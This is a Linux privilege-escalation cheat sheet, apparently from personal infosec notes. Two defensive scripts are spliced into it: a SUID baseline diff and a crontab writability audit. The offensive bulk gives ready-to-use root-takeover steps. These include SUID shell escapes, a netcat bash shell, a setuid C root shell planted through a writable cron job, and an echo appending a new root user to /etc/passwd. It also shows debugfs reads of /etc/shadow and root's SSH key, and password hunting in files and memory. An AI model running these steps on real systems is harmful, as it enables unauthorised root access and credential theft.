akde/infosec

Information security is ultimately about managing risk


1. Manual enumeration

id
pwd
uname -a // are there kernel exploits?
cat /etc/hosts
cat /etc/passwd
ls -lah /etc/passwd
cat /etc/group
cat /etc/fstab
cat /etc/crontab
df
cd /home && ls ... // or execute ls -lahR /home/
cd /root && ls ...
netstat -antup
ps aux
sudo -l
su // if passwords are already known
tmux ls
screen -list
cat /proc/self/... <- many interesting things.
ls /proc/self/root <- alternative path to the root dir!
uname -a // => Check for Kernel exploits
find / -type f -user $currentUser 2> /dev/null

// Check which packages are installed, here for Debian/Ubuntu
apt list --installed | grep -v automatic // drops packages marked [installed,automatic], leaving the manually installed ones

// Enumerate applications, /var/www/...

// Go through all log files....
// => Check syslog for CRON executions.

=> See this list of interesting Linux files.

Here as well

2. Script enumeration

Upload the _ex.tar file and begin to execute the enumeration scripts.

3. Extended enumeration

Go to these links.

Various notes

Techniques

Helper scripts

Monitoring scripts

Running root services

  • Check if vulnerabilities are known for a running process to fork a shell.
    • ps aux
    • netstat -antup
    • lsof -i
  • Known software:
    • MySQL: could support shell commands (system whoami within the mysql client)

Exploit SUID files

  • Find them
    • find / -type f -user root -perm /u+s -ls 2>/dev/null
      find / -user root -perm -4000 -print 2>/dev/null
      find / -perm -u=s -type f 2>/dev/null
      find / -user root -perm -4000 -exec ls -ldb {} \;
      find . -perm -o+r // find all world-readable files.
  • Check if vulnerabilities are known or if they have a feature to spawn a shell.
  • Nmap:
    • nmap --interactive
      !sh
  • Netcat / nc:
    • nc -e /bin/bash 127.0.0.1 4444
  • awk / gawk:
    • awk '{ print }' /etc/shadow
      awk 'BEGIN {system("id")}'
  • find:
    • find /home -exec nc -lvp 4444 -e /bin/bash \;
      find /home -exec /bin/bash \;
  • strace:
    • Write and compile a SUID C++ program
      strace chown root:root suid
      strace chmod u+s suid
      ./suid
  • npm:
    • ln -s /etc/shadow package.json && sudo /usr/bin/npm i *

=> Check https://gtfobins.github.io/ for a huge list with other binaries!

Caution:

  • Some binaries use less or another pager to display content. If the terminal is tall enough, they exit immediately. Make the terminal very small so that the program has to split the content over multiple "pages"; then, e.g., use !/bin/bash in the case of less.
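
From the defender's side, the same SUID inventory is most useful as a diff against a known-good baseline. The script below is an added example, not from the original page: list_suid and suid_diff are my own helpers, the tree and baseline are constructed, and it assumes GNU/BSD find, comm and sort.

```shell
#!/bin/sh
# Constructed example (not from the original page): inventory the SUID files
# under a tree and diff them against a saved baseline, so a SUID binary that
# appeared since the last run stands out, with the tools the list above names
# as shell-capable tagged explicitly. Assumes GNU/BSD find, comm and sort.

# list_suid ROOT : sorted list of files with the SUID bit under ROOT
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# suid_diff ROOT BASELINE : print NEW / NEW SHELL-CAPABLE / MISSING lines.
# BASELINE is a sorted file of paths from an earlier list_suid run.
suid_diff() {
    now=$(mktemp)
    list_suid "$1" > "$now"
    LC_ALL=C comm -13 "$2" "$now" | while read -r f; do   # in current set only
        case $(basename "$f") in
            nmap|nc|awk|gawk|find|strace|npm) echo "NEW SHELL-CAPABLE $f" ;;
            *)                                echo "NEW $f" ;;
        esac
    done
    LC_ALL=C comm -23 "$2" "$now" | sed 's/^/MISSING /'   # in baseline only
    rm -f "$now"
}

# demo_suid : constructed tree; setting u+s on our own files needs no root
demo_suid() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/bin" "$tmp/opt"
    for f in usr/bin/passwd usr/bin/su usr/bin/find opt/helper; do
        : > "$tmp/$f"; chmod 4755 "$tmp/$f"
    done
    : > "$tmp/usr/bin/ls"; chmod 0755 "$tmp/usr/bin/ls"   # not SUID, must not appear
    printf '%s\n' "$tmp/usr/bin/mount" "$tmp/usr/bin/passwd" "$tmp/usr/bin/su" \
        | LC_ALL=C sort > "$tmp/baseline"
    suid_diff "$tmp" "$tmp/baseline"
    rm -rf "$tmp"
}

demo_suid
```

On a real host, save `list_suid /` once after installation and run `suid_diff / that-file` from a timer; every NEW line is something to explain.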

Exploit cronjobs

  • Check if /etc/crontab and /etc/cron.* files are writable directly.
  • Check if files which are called / symlinked in the cron directories are writable
    • Check for world-writable files with find / -perm -2 -type f 2>/dev/null
  • Example with C code:
    • If you can write some root cron file, you can e.g. create a C file like this:
    • #include <stdio.h>
      #include <stdlib.h>      // system()
      #include <sys/types.h>
      #include <unistd.h>

      int main(void) {
          setuid(0);           // only succeeds once the binary is SUID root
          setgid(0);
          system("/bin/bash");
          return 0;
      }
    • Compile it here or wherever: gcc root.c -o /tmp/rootme; chmod u+s /tmp/rootme
    • Add the program to a writable cron job like
    • echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /.../cron-logrotate.sh
    • Wait until the script has run and $profit.
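
The same weakness is cheap to check for on your own hosts. The following is an added example and not part of the original page: audit_crontab and demo_audit are my own helpers, the crontab and files are constructed, and it assumes GNU/BSD find and awk.

```shell
#!/bin/sh
# Constructed audit helper (not from the original page): read a system-format
# crontab, pull out every absolute path a job references and flag the ones an
# unprivileged user could replace. Aim it at /etc/crontab and /etc/cron.d/*
# as a periodic self-check.

# audit_crontab FILE : print one finding per line (nothing printed = clean)
audit_crontab() {
    # Skip comments/blank lines. The command starts at field 7 (m h dom mon dow user)
    # or at field 3 for @reboot/@daily lines. Keep only tokens that look like paths.
    awk '!/^[ \t]*(#|$)/ {
            start = ($1 ~ /^@/) ? 3 : 7
            for (i = start; i <= NF; i++) if ($i ~ /^\//) print $i
         }' "$1" | LC_ALL=C sort -u | while read -r path; do
        case $path in /dev/*) continue ;; esac      # device nodes are meant to be writable
        [ -e "$path" ] || continue                   # not present on this host, nothing to check
        if [ -n "$(find -L "$path" -prune -perm -002 2>/dev/null)" ]; then
            echo "WORLD_WRITABLE $path"
        fi
        dir=$(dirname "$path")
        if [ -n "$(find -L "$dir" -prune -perm -002 ! -perm -1000 2>/dev/null)" ]; then
            echo "WORLD_WRITABLE_DIR $dir ($path)"    # target can be renamed or replaced
        elif [ -n "$(find -L "$dir" -prune -perm -002 2>/dev/null)" ]; then
            echo "STICKY_DIR $dir ($path)"            # /tmp-style: fine only while $path exists
        fi
    done
}

# demo_audit : build a throwaway tree with one clean job and two weak ones,
# run the audit against it and clean up. Everything below is constructed.
demo_audit() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/scripts" "$tmp/drop"
    chmod 0755 "$tmp/bin" "$tmp/scripts"; chmod 0777 "$tmp/drop"   # drop/ is open to everyone
    printf '#!/bin/sh\necho ok\n'     > "$tmp/bin/ok.sh";         chmod 0755 "$tmp/bin/ok.sh"
    printf '#!/bin/sh\necho backup\n' > "$tmp/scripts/backup.sh"; chmod 0777 "$tmp/scripts/backup.sh"
    printf '#!/bin/sh\necho rotate\n' > "$tmp/drop/rotate.sh";    chmod 0755 "$tmp/drop/rotate.sh"
    cat > "$tmp/crontab" <<EOF
# constructed system crontab
SHELL=/bin/sh
*/5 * * * * root $tmp/bin/ok.sh
0 2 * * *   root /bin/sh $tmp/scripts/backup.sh > /dev/null 2>&1
@daily      root $tmp/drop/rotate.sh
EOF
    audit_crontab "$tmp/crontab"
    rm -rf "$tmp"
}

demo_audit
```

The STICKY_DIR case matters because the cron line above points at /tmp: a job whose target lives in a sticky world-writable directory is safe only while that file already exists and belongs to root.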

Various

  • Check groups
    • To find all files that belong to a group:
      • find / -group internal 2> /dev/null
    • If the user is in the disk group, try this:
      • debugfs /dev/sda
        debugfs: cat /root/.ssh/id_rsa
        debugfs: cat /etc/shadow
  • Check sudoers
  • Check all files in home directories
  • Find files to write:
    • find . -writable
    • find / -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type f -writable -print 2>/dev/null
  • Find directories to write:
    • find / -regextype posix-extended -regex "/(sys|srv|proc|usr|lib|var)" -prune -o -type d -writable -print 2>/dev/null
  • Password checking:
    • Check for files containing PASSWORD
      • grep --color=always -rnw '/' -ie "PASSWORD" 2> /dev/null
        find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
    • Scan the memory for PASSWORD
      • strings /dev/mem -n10 | grep -i PASS
    • Check files with PASSWORD in their name
      • locate password
  • Determine system timers to see what is executed automatically and when it runs next:
    • systemctl list-timers --all
  • If a user on the system performed sudo a short time ago, use https://github.com/nongiach/sudo_inject
  • Can we read emails in /var/mail/?
  • Check files modified within a time window:
    • find / -newermt 2020-01-02 ! -newermt 2020-02-01 2> /dev/null
  • Is /etc/passwd writable?
    • If yes, change a user's password or add a new root user (the password hash can be generated with openssl passwd evil)
    • echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd

Collections

  • http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/


python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';